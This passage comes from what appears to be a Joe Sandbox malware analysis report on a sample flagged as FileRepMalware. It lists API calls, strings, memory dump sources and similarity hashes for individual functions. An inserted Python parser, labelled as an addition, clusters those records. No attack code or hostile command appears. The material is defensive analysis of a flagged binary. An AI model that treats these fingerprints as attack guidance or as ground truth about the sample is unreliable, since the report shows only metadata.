• SetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B377
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction ID: e6df2da1ecce8215fbd49e5bd092bce7faf38a5f3bd62840856d7f34346eabbf
• Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
• Instruction Fuzzy Hash: 23119220A0E60281FA5A772D554013FD1425F667B0F958334DB2E467EEFEACA481C720
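Added example, not code from the Joe Sandbox report: a small Python parser for the per-function records in this section. It splits the text at each APIs header, extracts the API call lines (including the indented "Part of subcall function" entries) and the Similarity fields, and groups functions by API String ID, so that functions with an identical API/string profile but different Opcode IDs, such as the two Value$ErrorLast helpers above, stand out. The SAMPLE text is a constructed excerpt that mirrors the report layout with field values copied from this page; the header names and bullet format are assumed to match the report as rendered here.

```python
"""Parse Joe Sandbox per-function records and cluster them by API String ID.

Added example; not part of the Joe Sandbox report. SAMPLE is a constructed
excerpt mirroring the report layout (values copied from the page, trimmed).
"""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7B2B74F11), ref: 00007FF7B2B7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11), ref: 00007FF7B2B7B30D
• SetLastError.KERNEL32(?,?,?,00007FF7B2B74F11), ref: 00007FF7B2B7B377
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
APIs
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68F5A
  • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69055
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
"""

# Section headers as they appear in the report; "APIs" opens a new record.
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_records(text):
    """Return one dict per record: {'apis': [...], 'fields': {...}}."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()          # drop the extraction indentation
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "fields": {}}
            records.append(rec)
            section = "APIs"
            continue
        if rec is None:
            continue
        if line in HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_CALL_RE.match(line)
            if m:
                rec["apis"].append({
                    "name": m["name"], "module": m["module"],
                    "args": m["args"].split(","), "ref": int(m["ref"], 16),
                    # address of the callee when the call is reported via a subcall
                    "subcall": int(m["sub"], 16) if m["sub"] else None,
                })
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                rec["fields"][m["key"].strip()] = m["value"].strip()
    return records


def split_api_string_id(value):
    """'2506987500-0' -> (2506987500, 0); the second half is 0 when String ID is empty."""
    api_part, _, str_part = value.partition("-")
    return int(api_part), int(str_part)


def api_names(record):
    """API names in report order, subcall entries included."""
    return [call["name"] for call in record["apis"]]


def cluster_by_api_string_id(records):
    """Map API String ID -> Opcode IDs; several Opcode IDs under one key means
    distinct functions with the same API/string profile."""
    clusters = defaultdict(list)
    for rec in records:
        key = rec["fields"].get("API String ID")
        if key:
            clusters[key].append(rec["fields"].get("Opcode ID"))
    return dict(clusters)


if __name__ == "__main__":
    for key, opcodes in cluster_by_api_string_id(parse_records(SAMPLE)).items():
        print(key, len(opcodes), "function(s):", ", ".join(o[:12] for o in opcodes))
```

Run it as-is to see the 2506987500-0 cluster with two members; feed it the whole report text instead of SAMPLE to cluster every function. Only the API call lines and Similarity fields are kept; the Memory Dump Source and Snapshot File lines are identical for every record and are skipped.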

APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction ID: 05bd1e00571816d784bd21264a45c0c88a40c8adfb83ae8ff0d975b697dc0cb8
• Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
• Instruction Fuzzy Hash: 0B31F222A1A68152E612B729A8402E7F294BF997D4F800136EF8C8375DFEBCD546C610
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7B2B6918F,?,00007FF7B2B63C55), ref: 00007FF7B2B62BA0
• MessageBoxW.USER32 ref: 00007FF7B2B62C2A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7B2B61B99), ref: 00007FF7B2B62760
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3AF
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3CE
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3F6
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B407
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B418
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Strings
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                    • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                    • Instruction ID: 021223d050dcdf596b6cf7bacd114ef25950b317e2b118e1c32a31a0cedf2373
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9761C532909BC185E722AF19E4407ABF7A0FBA5784F444225EB9D43B59EFBCD091CB14
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                    • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                    • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                    • Instruction ID: dfdf35c94a1499a2b4231167396f838d9f3b4e44d3aa28ff64e4f2337603bf4d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921E122709B4181E712AB28B8457ABB360EB99780F800136EF8D9771EFE7CD605C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                    • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction ID: f47c6dfe5457a1977ca536a7ec57ec50a504dd4a4b8f41f7e1890882c08b3106
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D11672B09A4089E752EF6DC4402AD77B1FB66798B804239DF5E97B99EE78D006C310
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction ID: 9c845aa00cd284ee15acc40bedeae4b2c7b9aeae3dbdd19f56e33b9c4a9f853a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE110621A0D14282F647A76DE54927BE252EBAA780FC84030DB4D87B9EEDBDD4C0C214
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                    • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                    • Instruction ID: f933a8e535a0e8425cdd95c7e598108658c05b899318956af60706f70ccc1b6a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14415D12A1A24241F7626B1DD40577BE690EBA27A4F944238EF4C0AADDFFBCD441CB10
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B79046
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B2B6CBA5), ref: 00007FF7B2B79064
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, xrefs: 00007FF7B2B79052
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
• API String ID: 3580290477-3624693095
• Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction ID: 75333a7cd189500cb1f0fb36940525c2acb25f483965cea86c4d71d1ea5e9a57
• Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction Fuzzy Hash: F541A132A0AA0285E757FF2D94400BEB3A4EB567D0B954035EB4D47BA9EE7CE491C320

Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction ID: 53016007c94c5f92feb0fdf920e9baac73490a641f8e52ca4767f7eae9c23db6
• Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction Fuzzy Hash: DA41B432719A4181EB61AF29E4443BAA760FBA9784F944135EF4D877A8FF7CD401C750

Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
• Instruction ID: 5dc69d1594f78e5476cd8a2e3690d6d0e25bc9fca476ecdc8cf057dd842afb2e
• Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
• Instruction Fuzzy Hash: 21212562A0928181EB22BB1CD04426FB3B1FBA5B44FC54039DB4D432ACEFBCD944C760

Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
